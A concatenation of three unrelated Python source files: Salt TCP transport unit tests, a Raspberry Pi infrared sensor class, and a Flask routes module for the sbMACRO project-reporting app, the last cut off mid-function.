import logging
import socket
import threading
import salt.config
import salt.exceptions
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.transport.client
import salt.transport.server
import salt.utils.platform
import salt.utils.process
from salt.ext import six
from salt.ext.six.moves import range
from salt.ext.tornado.testing import AsyncTestCase, gen_test
from salt.transport.tcp import (
SaltMessageClient,
SaltMessageClientPool,
TCPPubServerChannel,
)
from saltfactories.utils.ports import get_unused_localhost_port
from tests.support.helpers import flaky, slowTest
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
from tests.support.unit import TestCase, skipIf
from tests.unit.transport.mixins import (
PubChannelMixin,
ReqChannelMixin,
run_loop_in_thread,
)
log = logging.getLogger(__name__)
class BaseTCPReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
if not hasattr(cls, "_handle_payload"):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "tcp",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "tcp",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.stop = threading.Event()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.server_channel.close()
cls.stop.set()
cls.server_thread.join()
cls.process_manager.kill_children()
del cls.server_channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
"""
Test all of the clear msg stuff
"""
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(
self.minion_config, crypt="clear"
)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send"}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
@flaky
@slowTest
def test_badload(self):
"""
Test a variety of bad requests, make sure that we get some sort of error
"""
msgs = ["", [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "tcp",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "tcp",
"master_ip": "127.0.0.1",
"auth_timeout": 1,
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.PubServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.req_server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.stop = threading.Event()
cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
)
cls.server_thread.start()
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
@classmethod
def tearDownClass(cls):
cls.req_server_channel.close()
cls.server_channel.close()
cls.stop.set()
cls.server_thread.join()
cls.process_manager.kill_children()
del cls.req_server_channel
def setUp(self):
super(BaseTCPPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseTCPPubCase, self).tearDown()
failures = []
for k, v in six.iteritems(self.io_loop._handlers):
if self._start_handlers.get(k) != v:
failures.append((k, v))
if failures:
raise Exception("FDs still attached to the IOLoop: {0}".format(failures))
del self.channel
del self._start_handlers
class AsyncTCPPubChannelTest(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
@slowTest
def test_connect_publish_port(self):
"""
test when publish_port is not 4506
"""
opts = self.get_temp_config("master")
opts["master_uri"] = ""
opts["master_ip"] = "127.0.0.1"
opts["publish_port"] = 1234
channel = salt.transport.tcp.AsyncTCPPubChannel(opts)
patch_auth = MagicMock(return_value=True)
patch_client = MagicMock(spec=SaltMessageClientPool)
with patch("salt.crypt.AsyncAuth.gen_token", patch_auth), patch(
"salt.crypt.AsyncAuth.authenticated", patch_auth
), patch("salt.transport.tcp.SaltMessageClientPool", patch_client):
channel.connect()
assert patch_client.call_args[0][0]["publish_port"] == opts["publish_port"]
@skipIf(True, "Skip until we can devote time to fix this test")
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
"""
Tests around the publish system
"""
class SaltMessageClientPoolTest(AsyncTestCase):
def setUp(self):
super(SaltMessageClientPoolTest, self).setUp()
sock_pool_size = 5
with patch(
"salt.transport.tcp.SaltMessageClient.__init__",
MagicMock(return_value=None),
):
self.message_client_pool = SaltMessageClientPool(
{"sock_pool_size": sock_pool_size}, args=({}, "", 0)
)
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [
MagicMock() for _ in range(sock_pool_size)
]
def tearDown(self):
with patch(
"salt.transport.tcp.SaltMessageClient.close", MagicMock(return_value=None)
):
del self.original_message_clients
super(SaltMessageClientPoolTest, self).tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
def test_write_to_stream(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock._stream.write.return_value = []
self.assertEqual([], self.message_client_pool.write_to_stream(""))
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2]._stream.write.return_value = [1]
self.assertEqual([1], self.message_client_pool.write_to_stream(""))
def test_close(self):
self.message_client_pool.close()
self.assertEqual([], self.message_client_pool.message_clients)
def test_on_recv(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.on_recv.return_value = None
self.message_client_pool.on_recv()
for message_client_mock in self.message_client_pool.message_clients:
self.assertTrue(message_client_mock.on_recv.called)
def test_connect_all(self):
@gen_test
def test_connect(self):
yield self.message_client_pool.connect()
for message_client_mock in self.message_client_pool.message_clients:
future = salt.ext.tornado.concurrent.Future()
future.set_result("foo")
message_client_mock.connect.return_value = future
self.assertIsNone(test_connect(self))
def test_connect_partial(self):
@gen_test(timeout=0.1)
def test_connect(self):
yield self.message_client_pool.connect()
for idx, message_client_mock in enumerate(
self.message_client_pool.message_clients
):
future = salt.ext.tornado.concurrent.Future()
if idx % 2 == 0:
future.set_result("foo")
message_client_mock.connect.return_value = future
with self.assertRaises(salt.ext.tornado.ioloop.TimeoutError):
test_connect(self)
class SaltMessageClientCleanupTest(TestCase, AdaptedConfigurationTestCaseMixin):
def setUp(self):
self.listen_on = "127.0.0.1"
self.port = get_unused_localhost_port()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.listen_on, self.port))
self.sock.listen(1)
def tearDown(self):
self.sock.close()
del self.sock
def test_message_client(self):
"""
test message client cleanup on close
"""
orig_loop = salt.ext.tornado.ioloop.IOLoop()
orig_loop.make_current()
opts = self.get_temp_config("master")
client = SaltMessageClient(opts, self.listen_on, self.port)
# Mock the io_loop's stop method so we know when it has been called.
orig_loop.real_stop = orig_loop.stop
orig_loop.stop_called = False
def stop(*args, **kwargs):
orig_loop.stop_called = True
orig_loop.real_stop()
orig_loop.stop = stop
try:
assert client.io_loop == orig_loop
client.io_loop.run_sync(client.connect)
# Ensure we are testing the _read_until_future and io_loop teardown
assert client._stream is not None
assert client._read_until_future is not None
assert orig_loop.stop_called is True
# The run_sync call will set stop_called, reset it
orig_loop.stop_called = False
client.close()
# Stop should be called again, client's io_loop should be None
assert orig_loop.stop_called is True
assert client.io_loop is None
finally:
orig_loop.stop = orig_loop.real_stop
del orig_loop.real_stop
del orig_loop.stop_called
class TCPPubServerChannelTest(TestCase, AdaptedConfigurationTestCaseMixin):
@patch("salt.master.SMaster.secrets")
@patch("salt.crypt.Crypticle")
@patch("salt.utils.asynchronous.SyncWrapper")
def test_publish_filtering(self, sync_wrapper, crypticle, secrets):
opts = self.get_temp_config("master")
opts["sign_pub_messages"] = False
channel = TCPPubServerChannel(opts)
wrap = MagicMock()
crypt = MagicMock()
crypt.dumps.return_value = {"test": "value"}
secrets.return_value = {"aes": {"secret": None}}
crypticle.return_value = crypt
sync_wrapper.return_value = wrap
# try simple publish with glob tgt_type
channel.publish({"test": "value", "tgt_type": "glob", "tgt": "*"})
payload = wrap.send.call_args[0][0]
# verify we send it without any specific topic
assert "topic_lst" not in payload
# try simple publish with list tgt_type
channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
payload = wrap.send.call_args[0][0]
# verify we send it with correct topic
assert "topic_lst" in payload
self.assertEqual(payload["topic_lst"], ["minion01"])
# try with syndic settings
opts["order_masters"] = True
channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
payload = wrap.send.call_args[0][0]
# verify we send it without topic for syndics
assert "topic_lst" not in payload
@patch("salt.utils.minions.CkMinions.check_minions")
@patch("salt.master.SMaster.secrets")
@patch("salt.crypt.Crypticle")
@patch("salt.utils.asynchronous.SyncWrapper")
def test_publish_filtering_str_list(
self, sync_wrapper, crypticle, secrets, check_minions
):
opts = self.get_temp_config("master")
opts["sign_pub_messages"] = False
channel = TCPPubServerChannel(opts)
wrap = MagicMock()
crypt = MagicMock()
crypt.dumps.return_value = {"test": "value"}
secrets.return_value = {"aes": {"secret": None}}
crypticle.return_value = crypt
sync_wrapper.return_value = wrap
check_minions.return_value = {"minions": ["minion02"]}
# try simple publish with list tgt_type
channel.publish({"test": "value", "tgt_type": "list", "tgt": "minion02"})
payload = wrap.send.call_args[0][0]
# verify we send it with correct topic
assert "topic_lst" in payload
self.assertEqual(payload["topic_lst"], ["minion02"])
# verify it was correctly calling check_minions
check_minions.assert_called_with("minion02", tgt_type="list")
|
irSensor.py
|
import RPi.GPIO as GPIO
import time
import threading
from SAN.sensorDataEntry import SensorDataEntry
gpioPin = 23
class IrSensor(SensorDataEntry):
def __init__(self):
SensorDataEntry.__init__(self)
GPIO.setmode(GPIO.BCM)
GPIO.setup(gpioPin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
self._objectPresence = None
threading.Thread(target=self.loop).start()
def __del__(self):
GPIO.cleanup()
def loop(self):
while True:
time.sleep(0.01)
currentObjectPresence = GPIO.input(gpioPin) == 1
if self._objectPresence != currentObjectPresence:
self._objectPresence = currentObjectPresence
self.addReading(currentObjectPresence)
self.set_dirty()
@property
def sensorId(self):
return "ir_1"
@property
def sensorType(self):
return "IR Sensor"
@property
def measurementType(self):
return "Object Presence"
|
routes.py
|
"""Define main application routes."""
import os
import sys
import openpyxl
from datetime import datetime
from collections import OrderedDict
from flask import render_template, redirect, url_for, request, jsonify, current_app, session
from flask_login import current_user, login_required
from wtforms import StringField, SubmitField, TextAreaField, PasswordField
from wtforms import BooleanField
from wtforms.validators import ValidationError, DataRequired, Length, Email
from wtforms.validators import Optional
from app import db
from lxml import etree
import urllib
import requests
from xml.dom import minidom
from app.main.forms import EditProfileForm, FyForm, SearchForm
from app.models import User, casc, FiscalYear, Project, Item, SbFile, MasterDetails
from app.main import bp
from app.main.metadata import write_metadata
from app.main.forms import EditProfileForm, FyForm, GeneralForm
from app.models import User, casc, FiscalYear, Project, Item, SbFile
from app.auth.read_sheets import get_sheet_name, parse_values
from app.updater.__init__ import casc_update, search_table_update, graphs_update, proj_matches_update
import multiprocessing
import time
from nltk.corpus import stopwords
from config import Config
# from sbmacro import socketio
from pprint import pprint
# my_root = os.path.dirname(os.path.abspath(__file__))
# path_to_static = os.path.join(my_root, 'templates/static/')
path_to_static = os.getcwd() + '/app/main/templates/static/'
@bp.before_app_request
def before_request():
"""Update user 'last seen' field before each request."""
if current_user.is_authenticated:
current_user.last_seen = datetime.utcnow()
db.session.commit()
current_user.search_form = SearchForm()
@bp.route('/', methods=['GET', 'POST']) # Also accepts
@bp.route('/index', methods=['GET', 'POST']) # Default
def index():
# class F(GeneralForm):
# def __init__(i, buttonText):
# super(F, i).__init__()
# # i.name = BooleanField('static field')
# i.submit = SubmitField(buttonText)
# form = F('Refresh Metadata')
class F(FyForm):
pass
form = F()
"""Render splash page for sbMACRO."""
return(render_template('index.html', **locals(),
title="Welcome to sbMACRO"))
@bp.route('/metadata', methods=['GET', 'POST'])
def metadata():
tag_to_search = request.form['tag_to_search']
custom_stopwords = ['climate', 'change']
protocol = 'xml'
url_file_name = 'metadata_urls.csv'
us_states_file_name = 'us-states.csv'
us_states = []
with open(path_to_static + us_states_file_name, 'r') as file:
for state in file:
us_states.append(state.strip().lower())
stop_words = us_states + stopwords.words('english') + custom_stopwords
if request.method == 'POST':
casc_name = request.form['casc_name']
metadata_urls = []
with open(path_to_static + url_file_name, 'r') as file:
for line in file:
casc, url = line.split(',')
if casc == casc_name:
metadata_urls.append(url)
# write to csv to be read by wordcloud module
write_metadata(casc_name, tag_to_search, metadata_urls, stop_words)
return ''
@bp.route('/fiscal_years')
@bp.route('/fiscalyears')
@bp.route('/select_fiscalyear', methods=['GET', 'POST']) # Also accepts
@bp.route('/select_fiscalyears', methods=['GET', 'POST']) # Default
def fiscalyear():
"""Retrieve Fiscal Years and display for selection by user."""
cascs = db.session.query(casc).order_by(casc.name).all()
cascs_and_fys = {}
class F(FyForm):
pass
list_fy = []
for curr_casc in cascs:
cascs_and_fys[curr_casc.name] = {}
cascs_and_fys[curr_casc.name]["id"] = curr_casc.id
fys = db.session.query(FiscalYear).order_by(
FiscalYear.name).filter(
FiscalYear.casc_id == curr_casc.id).all()
cascs_and_fys[curr_casc.name]["fiscal_years"] = []
for fy in fys:
fiscal_year = {}
list_fy.append("fy" + str(fy.id))
fiscal_year["id"] = fy.id
fiscal_year["name"] = fy.name
cascs_and_fys[curr_casc.name]["fiscal_years"].append(fiscal_year)
setattr(F, "fy" + str(fy.id), BooleanField(fy.name))
form = F()
if form.validate_on_submit():
id_list = []
projects = []
for fy in list_fy:
fy_attr = getattr(form, fy)
selected = fy_attr.data
if selected:
id_list.append(fy.replace("fy", ""))
print('length of id_list:', len(id_list))
for i in id_list:
fy_model = db.session.query(FiscalYear).get(i)
for proj in fy_model.projects:
project_dict = {}
project_dict['fy_id'] = i
project_dict['casc_id'] = fy_model.casc_id
project_dict['proj_id'] = proj.id
projects.append(project_dict)
session["projects"] = projects
print('length of projects:', len(projects))
return redirect(url_for('main.report'))
elif request.method == 'GET':
pass
return render_template('fiscalYears.html',
form=form,
cascs_and_fys=cascs_and_fys,
title="Select Fiscal Years"), 400
@bp.route('/update_db', methods=['GET', 'POST'])
def update_db():
"""Retrieve CASCs and display for selection by user."""
update_graphs = False
update_search_table = False
update_proj_matches = False
cascs_to_update = []
list_of_cascs = ['Alaska', 'North Central', 'Northeast',
'Northwest', 'Pacific', 'South Central',
'Southeast', 'Southwest', 'National']
class F(FyForm):
pass
# set form attributs for 'update_search_table' checkbox
setattr(F, str('update_search_table'), BooleanField('update_search_table'))
# set form attributs for 'update_graphs' checkbox
setattr(F, str('update_graphs'), BooleanField('update_graphs'))
# set form attributs for 'update_proj_matches' checkbox
setattr(F, str('update_proj_matches'), BooleanField('update_proj_matches'))
# set form attributs for casc checkboxes
for curr_casc in list_of_cascs:
setattr(F, str(curr_casc), BooleanField(curr_casc))
form = F()
if form.validate_on_submit():
if getattr(form, 'update_search_table').data:
update_search_table = True
if getattr(form, 'update_graphs').data:
update_graphs = True
if getattr(form, 'update_proj_matches').data:
update_proj_matches = True
for csc in list_of_cascs:
csc_attr = getattr(form, csc)
selected = csc_attr.data
if selected:
cascs_to_update.append(csc)
session['update_graphs'] = update_graphs
session['update_search_table'] = update_search_table
session['update_proj_matches'] = update_proj_matches
session['cascs_to_update'] = cascs_to_update
return redirect(url_for('main.updates'))
elif request.method == 'GET':
pass
return render_template('update_db.html',
form=form, list_of_cascs=list_of_cascs), 400
# @socketio.on('connect', namespace='/test')
@bp.route('/updates')
def updates():
"""Refresh master details table and update the cascs selected for update"""
# --- select where to update from ---
source = 'sciencebase'
# source = 'file'
update_graphs = session['update_graphs']
if update_graphs:
print('Starting graph update thread')
graph_upate_thread = multiprocessing.Process(target=graphs_update)
graph_upate_thread.start()
update_search_table = session['update_search_table'] # same as master table
if update_search_table:
print('Starting search table update thread')
search_table_update_thread = multiprocessing.Process(
target=search_table_update, args=(source,)
)
search_table_update_thread.start()
update_proj_matches = session['update_proj_matches']
if update_proj_matches:
print('Starting project matches update thread')
proj_matches_update_thread = multiprocessing.Process(
target=proj_matches_update
)
proj_matches_update_thread.start()
cascs_to_update = session['cascs_to_update']
if cascs_to_update:
print('Starting CASC updates...')
casc_update_thread = multiprocessing.Process(
target=casc_update, args=(cascs_to_update,)
)
casc_update_thread.start()
return render_template("updates.html", update_graphs=update_graphs,
update_search_table=update_search_table,
update_proj_matches=update_proj_matches,
cascs_to_update=cascs_to_update
)
@bp.route('/trends', methods = ['GET', 'POST'])
def trends():
return render_template('trends.html')
@bp.route('/bursts', methods = ['GET', 'POST'])
def bursts():
return render_template('bursts.html')
@bp.route('/write_exclusions', methods = ['GET', 'POST'])
def write_exclusions():
if request.method == 'POST':
exclusion_list = request.form.getlist('exclusions[]')
exclusion_file_name = 'exclusions.csv'
write_header = False
if not os.path.exists(path_to_static + exclusion_file_name):
write_header = True
with open(path_to_static + exclusion_file_name, 'a') as file:
if write_header:
file.write('phrase\n')
for phrase in exclusion_list:
file.write(phrase + '\n')
file.close()
return ''
@bp.route('/casc_projects/<params>', methods = ['GET', 'POST'])
def casc_projects(params):
casc_name, num_projects, num_datasets = params.split('|')
return render_template('casc_projects.html',
casc_name=casc_name,
num_projects=num_projects,
num_datasets=num_datasets
)
@bp.route('/proj_compare', methods=['GET', 'POST'])
def proj_compare():
return render_template('proj_compare.html')
@bp.route('/projects', methods=['GET', 'POST'])
@bp.route('/select_project', methods=['GET', 'POST'])
@bp.route('/select_projects', methods=['GET', 'POST'])
def project():
"""Display and implement selection/searching for projects by URL."""
if request.method == 'POST':
sb_urls = request.form.getlist("SBurls")
print("sb_urls:")
pprint(sb_urls)
projects = []
for url in sb_urls:
project_dict = {}
proj = db.session.query(Project).filter(Project.url == url).first()
if proj is None:
print("---Error: Could not find project for {}".format(url))
continue
else:
print("Found: {0}: {1}".format(proj.id, proj.name))
fys = proj.fiscal_years
if len(fys) > 1:
project_dict['fy_id'] = []
project_dict['casc_id'] = []
for fy in fys:
project_dict['fy_id'].append(fy.id)
project_dict['casc_id'].append(fy.casc_id)
else:
fy = fys[0]
project_dict['fy_id'] = fy.id
project_dict['casc_id'] = fy.casc_id
project_dict['proj_id'] = proj.id
projects.append(project_dict)
session["projects"] = projects
return redirect(url_for('main.report'))
return(render_template('projects.html',
title="Select Projects to Report")), 400
@bp.route('/report')
def report():
"""Gather appropriate report information and display."""
excel_file = 'CASC Data Management Tracking for Projects - v2.xlsx'
try:
project_list = session["projects"]
except KeyError:
return render_template("error.html",
message="Please select Fiscal Year \
First To Generate Report"
)
# except TypeError:
# return render_template("error.html", message="Please Login ")
projects = []
workbook = None
# Decide whether to load project tracking excel workbook
if current_user.is_authenticated and current_user.access_level > 0:
for project in project_list:
casc_item = db.session.query(casc).get(project['casc_id'])
if get_sheet_name(casc_item.name):
# Load workbook
try:
print('Opening {}...'.format(excel_file))
workbook = openpyxl.load_workbook(excel_file)
print('Successfully opened {}'.format(excel_file))
except Exception:
print('File error: {}'.format(excel_file))
# No need to continue if workbook has just been loaded
break
class ReportItem(object):
"""Object to be passed to front-end for display in table and modal."""
name = None
id = None
sb_id = None
url = None
obj_type = None
data_in_project_GB = None
num_of_files = None
total_data_in_fy_GB = None
timestamp = None
dmp_status = None
pi_list = []
summary = None
history = None
item_breakdown = None
potential_products = None
products_received = []
file_breakdown = []
# Possibly necessary info:
casc = None
fiscal_year = None
project = None
item = None
def __init__(i, obj_type, obj_db_id, fy_db_id, casc_db_id):
"""Initialize ReportItem class object.
Arguments:
obj_type -- (string) 'project', 'fiscal year', 'casc', 'item',
'sbfile', or 'problem item' to determine the type
of object being created.
obj_db_id -- (int) the database id for the item being created.
fy_db_id -- (int or list) the database id for the item's
fiscal year of concern.
casc_db_id -- (int or list) the database id for the item's
casc year of concern.
"""
sheet = {}
if obj_type == 'project':
i.obj_type = obj_type
proj = db.session.query(Project).filter(
Project.id == obj_db_id).first()
if proj is None:
raise Exception # It has to be there somewhere...
else:
i.name = proj.name
i.id = obj_db_id
i.sb_id = proj.sb_id
i.url = proj.url
# convert from MB -> GB
i.data_in_project_GB = proj.total_data / 1000
i.num_of_files = proj.files.count()
if fy_db_id is list:
i.fiscal_year = []
i.casc = []
i.total_data_in_fy_GB = []
for fy_id in fy_db_id:
fy = db.session.query(FiscalYear).get(fy_id)
i.fiscal_year.append(fy.name)
casc_model = db.session.query(casc).get(fy.casc_id)
i.casc.append(casc_model.name)
# convert from MB -> GB
i.total_data_in_fy_GB.append(
fy.total_data / 1000)
else:
fy = db.session.query(FiscalYear).get(fy_db_id)
i.fiscal_year = fy.name
casc_model = db.session.query(casc).get(casc_db_id)
i.casc = casc_model.name
# convert from MB -> GB
i.total_data_in_fy_GB = fy.total_data / 1000
i.timestamp = proj.timestamp
i.pi_list = []
for pi in proj.principal_investigators:
curr_pi = {'name': pi.name, 'email': pi.email}
i.pi_list.append(curr_pi)
i.summary = proj.summary
i.products_received = []
for item in proj.items:
curr_item = {'name': item.name, 'url': item.url}
i.products_received.append(curr_item)
# Things that depend on user access level:
if current_user.is_authenticated:
if current_user.access_level > 0:
# Parse excel sheet
sheet_name = get_sheet_name(i.casc)
if sheet_name:
values = []
for vals in workbook[sheet_name].values:
if vals[0] is None:
break
values.append(vals)
sheet = parse_values(values)
# ACTION ITEM: In a production app, you likely
# want to save these credentials in a
# persistent database instead.
session['credentials'] = credentials_to_dict(
credentials)
try:
# DMP Status
i.dmp_status = sheet[proj.sb_id]['DMP Status']
if i.dmp_status is None or\
i.dmp_status.isspace() or\
i.dmp_status == "":
i.dmp_status = "No DMP status provided"
# History
i.history = sheet[proj.sb_id]['History']
if i.history is None or\
i.history.isspace() or\
i.history == "":
i.history = "No data steward \
history provided"
# Potential Products
i.potential_products = \
sheet[proj.sb_id]['Expected Products']
if i.potential_products is None or\
i.potential_products.isspace() or\
i.potential_products == "":
i.potential_products = "No data potential \
products \
provided"
except KeyError:
i.dmp_status = "Project not currently \
tracked by Data Steward"
i.history = "Project not currently \
tracked by Data Steward"
i.potential_products = "Project not currently \
tracked by Data Steward"
else:
i.dmp_status = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.history = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
i.potential_products = "Please email "\
+ "administrators at {} to receive access "\
.format(current_app.config['ADMINS'][0])\
+ "privileges to view this content."
else:
i.dmp_status = "Please login to view this content."
i.history = "Please login to view this content."
i.potential_products = "Please login \
to view this content."
i.file_breakdown = []
proj_file_list = []
for sbfile in proj.files:
proj_file_list.append(sbfile.id)
if len(proj_file_list) > 0:
file_breakdown_list = db.session.query(
SbFile.content_type, db.func.count(
SbFile.content_type)).group_by(
SbFile.content_type).filter(
# sqlalchemy max query items is 999
SbFile.id.in_(\
proj_file_list[:999])).all()
proj_file_list[:] = []
for _tuple in file_breakdown_list:
temp_dict = {}
temp_dict['label'] = _tuple[0]
temp_dict['count'] = _tuple[1]
proj_file_list.append(temp_dict)
i.file_breakdown = sorted(
proj_file_list,
key=lambda k: k['count'],
reverse=True)
elif obj_type == 'fiscal year':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'casc':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'item':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'sbfile':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
elif obj_type == 'problem item':
pass # We don't do anything with fiscal year objects on the
# front-end yet.
for project in project_list:
new_obj = ReportItem(
'project', project['proj_id'],
project['fy_id'],
project['casc_id']
)
projects.append(new_obj.__dict__)
return render_template("report.html", projects=projects)
@bp.route('/verticalbar')
def verticalbar():
"""Gather appropriate report information and display."""
excel_file = 'CASC Data Management Tracking for Projects - v2.xlsx'
project_list = session["projects"]
projects = []
workbook = None
# Decide whether to load project tracking excel workbook
if current_user.is_authenticated and current_user.access_level > 0:
for project in project_list:
casc_item = db.session.query(casc).get(project['casc_id'])
if get_sheet_name(casc_item.name):
# Load workbook
try:
print('Opening {}...'.format(excel_file))
workbook = openpyxl.load_workbook(excel_file)
print('Successfully opened {}'.format(excel_file))
except Exception:
print('File error: {}'.format(excel_file))
# No need to continue if workbook has just been loaded
break
class ReportItem(object):
"""Object to be passed to front-end for display in table and modal."""
name = None
id = None
sb_id = None
url = None
obj_type = None
data_in_project_GB = None
num_of_files = None
total_data_in_fy_GB = None
timestamp = None
dmp_status = None
pi_list = []
summary = None
history = None
item_breakdown = None
potential_products = None
products_received = []
file_breakdown = []
# Possibly necessary info:
casc = None
fiscal_year = None
project = None
item = None
def __init__(i, obj_type, obj_db_id, fy_db_id, casc_db_id):
"""Initialize ReportItem class object.
Arguments:
obj_type -- (string) 'project', 'fiscal year', 'casc', 'item',
'sbfile', or 'problem item' to determine the type
of object being created.
obj_db_id -- (int) the database id for the item being created.
fy_db_id -- (int or list) the database id for the item's
fiscal year of concern.
casc_db_id -- (int or list) the database id for the item's
casc year of concern.
"""
sheet = {}
if obj_type == 'project':
i.obj_type = obj_type
proj = db.session.query(Project).filter(
Project.id == obj_db_id).first()
if proj is None:
raise Exception # It has to be there somewhere...
else:
i.name = proj.name
i.id = obj_db_id
i.sb_id = proj.sb_id
i.url = proj.url
# convert from MB -> GB
i.data_in_project_GB = proj.total_data / 1000
i.num_of_files = proj.files.count()
if fy_db_id is list:
i.fiscal_year = []
i.casc = []
i.total_data_in_fy_GB = []
for fy_id in fy_db_id:
fy = db.session.query(FiscalYear).get(fy_id)
i.fiscal_year.append(fy.name)
casc_model = db.session.query(casc).get(fy.casc_id)
i.casc.append(casc_model.name)
# convert from MB -> GB
i.total_data_in_fy_GB.append(
fy.total_data / 1000)
else:
fy = db.session.query(FiscalYear).get(fy_db_id)
i.fiscal_year = fy.name
casc_model = db.session.query(casc).get(casc_db_id)
i.casc = casc_model.name
# convert from MB -> GB
i.total_data_in_fy_GB = fy.total_data / 1000
i.timestamp = proj.timestamp
i.pi_list = []
for pi in proj.principal_investigators:
curr_pi = {'name': pi.name, 'email': pi.email}
i.pi_list.append(curr_pi)
i.summary = proj.summary
i.products_received = []
for item in proj.items:
curr_item = {'name': item.name, 'url': item.url}
i.products_received.append(curr_item)
# Things that depend on user access level:
if current_user.is_authenticated:
if current_user.access_level > 0:
# Parse excel sheet
sheet_name = get_sheet_name(i.casc)
if sheet_name:
values = []
for vals in workbook[sheet_name].values:
if vals[0] is None:
break
values.append(vals)
sheet = parse_values(values)
# ACTION ITEM: In a production app, you likely
# want to save these credentials in a
# persistent database instead.
session['credentials'] = credentials_to_dict(
credentials)
try:
# DMP Status
